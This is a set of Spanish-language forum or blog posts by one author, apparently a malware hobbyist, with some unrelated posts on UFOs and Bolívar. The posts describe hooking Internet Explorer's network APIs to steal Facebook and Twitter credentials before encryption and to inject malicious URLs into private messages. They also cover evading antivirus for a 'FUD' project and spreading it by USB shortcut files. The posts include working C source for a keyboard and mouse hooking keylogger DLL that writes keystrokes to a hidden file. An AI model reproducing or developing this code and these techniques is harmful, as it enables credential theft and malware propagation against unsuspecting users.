Bueno me decidi husmear en las reds sociales y empece con facebook logrando algo....  

  En muchos sitios por alli sobre todo en el blog de YST lei que para intercalar MP en Facebook habria que hookear apis de wininet y  en cierto grado es verdad, si hookeamos la api HttpSendRequestW en IExplorer podemos interceptar las credenciales del facebook antes de pasar por las ssl en el cuarto parametro de la API:

 


  Obtenemos una cadena como esta:


  podemos filtrar esta cadena en el hook buscando señas como "charset_test=" y "email=" y guardarla en un archivo o enviarlas directamente por sockets ..  

  Pero este no es mi objetivo mi fin es lograr intercalar una URL maliciosa en un MP   .......

  Por lo que despues de debbugear y hookear varias apis de wininet decidi hacerlo a la Chuck Norris: "HOOKEANDO SEND" .....   ....

  En el momento de enviar un MP por el fakebook   IExplorer realiza un send enviando una cadena como esta:

  
  Como veran despues de status= esta el mensaje con unos feos %20 que sustituyen los espacios si queremos intercalar algun mensaje tendriamos que crear un buffer asi:


 y le concatenamos la cadena original desde &action= quedando algo asi ....

 
  Y al enviar la cadena lleva la URL intercalada   .........

  Con Twetter estaba probando algo con el hook a la api HttpSendRequestW se puede obtener las credenciales filtrando una cadena como esta:

  
  se puede filtrar buscando señas y como veran alli estan las credenciales antes de pasar por las ssl   .........

  Iva a intentar intercalar twets maliciosos pero por alguna extraña razon la pagina de twetter tiene problemas   ......


  PD: No subo source aqui esta la idea   no quiero que algun "experto" propague malware asi no mas sin esforzarce XD  


  Saludos..  

  Tengo dias que no puedo ingresar ni a la web ni al foro ¿Esta caido?.... Ayer pude ingresar a la web pero habia una pagina en blanco que tenia un bonito mensaje referente a mi trasero   ......  

  Bueno la era Autorun.inf creo que esta llegando a su fin  en mi proyecto genero un autorun con ofuscacion aleatoria que solo era detectado por 3 AV entre ellos AVAST me parecia bien hasta que probe los 3 AV en otro pc de prueba con mi autorun los otros dos lo unico que hacen es borrar el autorun pero AVAST .... por heuristica  busca la ruta del exe en el autorun y lo detecta como Troyan Horse  no solo eso sino que borra todas las copias del exe en el pendrive  y al final aparece una ventanita diciendo si el usuario aceptaria enviar las muestras a AVAST para su analisis  si fuera una copia de PI o Biefrost no importara pero mi proyecto es 100% fud y eso no me gustaria para nada ......... Y es por mera heuristica ya que si copio el server en el Pen drive sin el autorun Avast no lo detecta  ........

  Me puse a investigar y lei un articulo sobre Stuxnet especificamente sobre la infeccion de dispositivos USB con LNKs y me parecio muy interesante  basicamente consiste en subir el server a algun webhosting y generar un acceso directo a esa url, ese acceso directo  se podria bindear con el server y cada vez que detecte un Dispositivo copiaria el acceso directo al pendrive con algun nombre llamativo o con algun nombre relacionado con los directorios u archivos del pendrive  de alguna manera stuxnet hace que el acceso directo se active cuando se accede al pendrive pero basicamente funciona ... 

   No se si alguien sabra algo mas para compartir? ...

  Saludos ....

  Bueno soy asiduo lector de este señor y es algo viejo el Paper pero esta muy completo y explicado   De muy buena lectura para el que quiere saber como funcionan las cosas y el paper en si da muchas luces para el diseño   ......



  Espero que les guste  

  Bueno hoy en dia hay una ola de avistamientos Ovnis en china asi como en la decada de los 40 y 50 en USA . Mi hipotesis es que esa gente concentra su estudio en las zonas mas desarrolladas ..... Ya ET sabe que USA no es la principal potencia   .......

 http://www.larazon.es/noticia/5454-senores-pasajeros-cerramos-el-aeropuerto-porque-hemos-visto-un-ovni



 

  Tengo problemas con estas funciones ....

DLL

 
LRESULT CALLBACK Filtro(int nCode, WORD wParam, DWORD lParam) { 
                if(nCode<0){ 
                   return(CallNextHookEx(gancho,nCode,wParam,lParam)); 
                   } 
                if (lParam & (1 << 31)) { 
                   char path[MAX_PATH];
                   FILE *datos; 
                   BYTE KeyboardState[256]; 
                   GetKeyboardState(KeyboardState); 
                   WORD CharValue; 
                   strcpy(path,getenv("USERPROFILE"));
                   strcat(path,"\\Shellx64\\SPACK\\KLG.KL");
                   if(ToAscii(wParam,0,KeyboardState,&CharValue,0) > 0){ 
                       if((datos=fopen(path,"at"))==NULL){ 
                                  return CallNextHookEx(gancho,nCode,wParam,lParam); 
                                  } 
                          fprintf(datos,"%c",(char)CharValue); 
                          fclose(datos); 
                   } 
                } 
 
                return CallNextHookEx(gancho,nCode,wParam,lParam); 
} 
LRESULT CALLBACK FiltroMouse(int nCode, WORD wParam, LPARAM lParam) 
{ 
                if(nCode!=HC_ACTION )
                { 
                   return(CallNextHookEx(ganchom,nCode,wParam,lParam)); 
                   }  
                else 
                  switch(wParam)
                       {
                       case WM_LBUTTONDOWN:
                           { 
                            PMOUSEHOOKSTRUCT MH=(PMOUSEHOOKSTRUCT)lParam;
                            GuardarPosicion(MH->pt.x,MH->pt.y) ;
                            Sleep(200);
                            break;
                             }
                       default:
                         return CallNextHookEx(ganchom,nCode,wParam,lParam); 
                      }
 
return CallNextHookEx(ganchom,nCode,wParam,lParam); 
} 
EXTERN_C __declspec(dllexport)int CreaHook(BOOL Instala, HINSTANCE DLLInst,char* DIRKL) { 
    char path[MAX_PATH];               
      strcpy(path,getenv("USERPROFILE"));
      strcat(path,"\\Shellx64\\SPACK\\KLG.KL");  
      FILE *datos;
    if(Instala==TRUE) { 
                          LoadDllss();
                          if((datos=fopen(path,"at"))!=NULL)
                          {  
                             fprintf(datos,"%s","IniciandoKL");
                             fprintf(datos,"%s",DIRKL); 
                             fclose(datos);
                           }
                          gancho=MySetWindowsHook(WH_KEYBOARD,(HOOKPROC)Filtro,DLLInst,0); 
 
                          if(gancho==NULL){ 
                                 return 0; 
                          }
                          else{ 
                                 return 1; 
                          } 
                     }else{ 
                         if((datos=fopen(path,"at"))!=NULL)
                          {  
                             fprintf(datos,"%s","TerminandoKL");
                             fprintf(datos,"%s",DIRKL); 
                             fclose(datos);
                           } 
                         return UnhookWindowsHookEx(gancho); 
 
                   } 
} 
EXTERN_C __declspec(dllexport)int CreaHookMouse(BOOL Instala, HINSTANCE DLLInst,char* DIRKL) { 
       char path[MAX_PATH];               
      strcpy(path,getenv("USERPROFILE"));
      strcat(path,"\\Shellx64\\SPACK\\KLG.KL");  
      FILE *datos;            
                  if(Instala==TRUE) { 
                          LoadDllss();
                           if((datos=fopen(path,"at"))!=NULL)
                          {  
                             fprintf(datos,"%s","IniciandoBKER");
                             fprintf(datos,"%s",DIRKL); 
                             fclose(datos);
                           }
 
                          ganchom=MySetWindowsHook(WH_MOUSE,(HOOKPROC)FiltroMouse,DLLInst,0); 
 
                          if(ganchom==NULL){ 
                                 return 0; 
                          }else{ 
                                 return 1; 
                          } 
                   }else{ 
                         if((datos=fopen(path,"at"))!=NULL)
                          {  
                             fprintf(datos,"%s","TerminandoBKER");
                             fprintf(datos,"%s",DIRKL); 
                             fclose(datos);
                           } 
                       return UnhookWindowsHookEx(ganchom); 
 
                     } 
} 

main

main()
{
HMODULE Dll=LoadLibraryA(DIRKL);
 Funcion = (LPFuncion)GetProcAddress(Dll,"CreaHook");
 FuncionM = (LPFuncionM)GetProcAddress(Dll,"CreaHookMouse");
 //INY=new Inyector(INFO->Masterdir ,CFS->RTKNAMEdll,INFO->SoyAdm);
 int lp=0;
 IniciarKeyLog();
bool banana=false,banana1=false;;
while(1)
    {
 
	 strcpy(LINKK,"NULL");
	 strcpy(LINKVINS,"NULL");
	 EnumWindows((WNDENUMPROC)EnumProc1,lp);
	 if(strcmp(LINKK,"NULL")!=0&&!banana)
	   {
		banana=true; 
		FuncionM(TRUE,Dll,LINKK);
	   }
     if(strcmp(LINKK,"NULL")==0&&banana)
	   {
        banana=false; 
		FuncionM(FALSE,Dll,LINKK);
	   }
	 if((strcmp(LINKVINS,"NULL")!=0||strcmp(LINKK,"NULL")!=0)&&!banana1)
	   {
		banana1=true; 
		Funcion(TRUE,Dll,LINKVINS);
	   }
     if((strcmp(LINKVINS,"NULL")==0&&strcmp(LINKK,"NULL")==0)&&banana1)
	   {
        banana1=false; 
		Funcion(FALSE,Dll,LINKVINS);
	   }
	 Crono1++;
	 Crono2++;
     Sleep(3000);
     }
 return 0;
}
 

  El pedaso de codigo del main es un extracto del main principal de mi programa ....
En si lo que intento hacer es detectar ciertas ventanas y si estan activas activar los hooks todo funciona de maravilla pero me interesa que al momento d eno existir ninguna ventana de interes los hooks sean desinstalados... por cuestiones de optimizacion ....... Pero al momento de cerrar la ventana de interes, la aplicacion desinstala los hooks perfectamente, pero explorer.exe, iexplorer.exe y firefox.exe rebotan unos feos errores que los obliga ha cerrar   y ya saben el escandalo que se forma cuando se cierra explorer por lo que esto no me sirve   claro despues de reiniciar los serviciso tanto la dll como el exe siguen trabajando sin problemas y los hooks quedan desinstalados .... Se que hay que pulir un hook para que detecte teclas invisibles como TAB, F1 las flechas y todas esas cosas pero primero quiero que los hooks se instalen y desinstalen a la perfeccion.......

Algun Cable?

  Tambien se puede dejar ese puñal alli metido y no deshokearlos   pero eso seria mucha data irrelevante ...

 Saludos ....

  Se que esto va en el subforo de c++ pero he obtenido mas ayuda aqui que en ese subforo 

  Bueno no se si los usuarios han notado un fuerte crecimiento en paginas infectadas y campañas de propagacion de malware  .... en una semana he sido infectado 4 veces solo navegando y accidiendo a paginas de "confianza"..

  Explico:

  Hace 5 dias fui victima de un muy picaro worm P2P muy bien elaborado que igual me fue muy facil eliminar...

  Dos dias despues descargue un Pdf y venia con su respectivo regalito ...  un lindo troyano bancario el cual a las pocas horas de infeccion intente acceder a mis cuentas bancarias y al escribir el sitio del banco en el exploraror me aparecio un lindo cartelito del firewall de windows diciendome que IExplorer necesitaba permisos para "Abrir Puertos"  ....... Otra vez avira solito se lo cargo ....... 


  Hace dos dias enfrente un monstruo del cual no hay ninguna info en internet, y el puto binario me lo cargue por lo que no pude recojer una muestra  , la custion empezo al ingresar a una pagina cuyo nombre omito por custiones personales  .... lo cierto es que IExplorer Peto por lo que lo termine desde el taskmgr ..... de una vez se me prendio la luz de la desconfianza  ...... Al rato Avira quedo nockaut , y el firewall de windows quedo desactivado  de ninguna manera pude reiniciar los dos servicios al ver esto desconecte el modem y lo guarde en una gabeta con llave ...... SO Xp actualizado, avira version completa actualizada  .. IExplorer 8 actualizado ..... Prosigo reinicie en Modo a prueba de fallos y pude arrancar el avira..... hice un scan dos trollanos de caracteristicas diferentes guardados en appdata, y Userprofile, facil de borrar el tercero era la peor de mis pesadillas un archivo .Sys guardado en %Systemroot%\\drivers detectado por heuristica como TR\Agent586 a lo cual por su puesto avira no pudo borrar .....  .......

  El archivo se alojo como kijpdhl.sys y creo una llave en HKLM\\Curren controlSet2\\Services ....  con el nombre kijpdhl.sys y claro no podia ver lo que habia dentro ni siquiera como administrador  ... Lo mas lindo fue al intentar buscar el archivo no podia abrir la carpeta drivers  para acceder tuve que hacerlo desde cmd y escribiendo la palabra system32 con codigos Alt es decir%%

  Al ver todo esto solo quedo el plan c que tengo para estos casos .... ¿Formatear? pues no 10K canciones bajadas por el emule incontable codigo y documento que no tenia donde meterlos XD .... Asi que desempolve un HD con una version limpia de windows y avira instalado, instale el had y arranque la maquina por alli para luego cargarme el driver ese XD .......

  Sorpresa: al hacer esto los driver de la tarjeta de red quedaron daños y no hubo forma humana de arreglar esto por lo que tuve que reinstalar todos los drivers ......

  El Archivo Kijpdhl.sys pesa 505KB  que es demasiado para ser malware asi que debe tener muchos juguetes para entretener a las victimas  .......


  Hoy intente leer esta noticia....


  Y me aparecio un lindo cartelito del IEXPLORER diciendome que mi PC estaba bajo ataque de malware    Por lo que estoy corriendo el AV de nuevo  ....


  Voy a desempolvar una vieja version de OpenSuse, y la instalare en una particion para ver si puedo navegar en paz .....

  Windows esta bajo ataque hoy mas que nunca XD .....

  Bueno eso y despues dicen que tenemos libertad de expresion    .......

  Gracias a dios y existen los proxys .....

 


 



                                                          Tontos de Cantv 

  Ayer estaba huzmeando en la red p2p y encontre un bonito rar con el nombre "Poker Bot"  , lo descargue y pudo mas la Curiosidad que la Precaucion asi que me dije "A ver que hay aqui si me infecto Al diablo" ......

 Aqui una muestra de lo que baje no es el original que baje ayer ya que fue exterminado ...   asi que busque un archivo relacionado cuyo nombre  estaba en el code del bicho y aqui esta ...


  Bueno me quede esperando el cuadro de dialogo e informacion de instalacion de mi "Poker Bot", en vez de eso el instalador abrio el Firefox y me direcciono a una pagina de compras online pero de mi poker Bot nada   ... Asi que dije "Me jodieron", abri el administrador de tareas (Por lo menos abrio) y alli estaba un lindo proces SYSTEM con el nombre wins.exe, ademas note que cada 10 sg s eejecutaba una cosa llamada 7Zip.exe, eran las 2 am asi que apague la perola y me fui a dormir  .........

  Hoy me levanta encendi el PC y note sierta lentitud, el centro de seguridad de windows estaba en rojo y al abrir estaba el firewall de windows desactivado, y mi AV Avira estaba desactualizado, y desactivado  ... lo primero que hice fue actualizar el AV.., hice un scan detecto el wins.exe pero cuando lo estaba borrando la pc se apago   asi que reinicie en modo a prueba de fallos y lo volvi a correr .......

  Al buscar con regedit el famoso wins.exe estaba instalado como servicio con el nombre Windows Internet Name Service, la cual borre por supuesto y tenia una llave para permisos en el firewall de windows , tambien borrado XD....... Alli vi el Directorio donde estaba esa cosa yo crei que era alguna copia de spynet, Biefrost, sub7 a lo mucho el rxbot pero cuando abro el directorio     .....

  

  Vi carpetas como incoming, archivos . meat, nodos.dat   asi que me di cuenta que esto no era algo normal tiene toda la estructura de un Bot P2P   Abri la Carpeta Incoming y miren .......

  

  Esa captura fue sepues que pasara el avira por alli, habian por lo menos 100 archivos rar cuyos nombres Ivan desde Hack MSN.rar hasta Conter Strike 1.rar  , lo mas raro es que revise el emule y esa carpeta no aparece compartida   por lo que intuyo que esa cosa inyecta el emule y envia info de esos archivos para compartir via hooks........

  Luego revise Server.met y encontre esto

  
  Si pueden ver alli hay una lista de Ips que seguro estan infectadas y dado el nombre del archivo apuesto que son supernodos y una de esas ha de ser la del BoboMaster  ......

  Wins.exe es detectado por avira como "TR/ATRAPS G2", y esta cosa instala otro malware "7Zip.exe" que es detectado como "TR/Mowidin G2", No infecta Dispositivos USB ni tampoco ejecutables ........ El archivo nodos.dat esta cifrado   .....

  Al buscar la muestra para subir vi esto ...

  

  Como veran en el circulo se puede ver que hay 561 fuentes disponibles asi que no es muy grande la red si tomamos en cuenta que todas esas pc estan infectadas ..... En mi opinion esta en gestacion   ....

  Alli les dejo el binario para ver que mas le pueden sacar   ........

  No tiene mucho de nuevo lo que me llama la atencion es que es P2P   ....

  Saludos ...

  Bueno ayer en cadena nacional vi la exhumacion del Venezolano mas grande que ha pisado la tierra, la verdad que todo el tiempo veia a BOLIVAR como un mito un personaje en la historia, pero ayer al ver sus restos mortales no pude contener la emocion y varias lagrimas brotaron de mis ojos, y me di cuenta que el no es un mito, el existio y alli esta sus restos mortales su legado hoy esta mas  vigente que nunca  en el mundo y cada palabra y cada carta que el escribio hoy cobra mas vigencicia que nunca. El fue es y sera el gran Latinoamericano que, como el vienen al mundo cada quinientos años....


  Viva mi PADRE el LIBERTADOR de Ameica   ........



  AHORA JOALA Y NUESTRO PADRE HAYA MUERTO DE TUBERCULOSIS, Y NO SEA OTRA COSA POR QUE ¿SI NO? ......   EL ODIO QUE VOY HA TOMAR CONTRA CIERTAS PERSONAS VA HA SER GIGANTESCO